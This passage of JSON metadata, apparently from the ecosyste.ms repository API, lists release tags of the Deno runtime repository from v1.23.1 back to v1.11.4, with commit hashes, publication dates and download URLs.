000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":n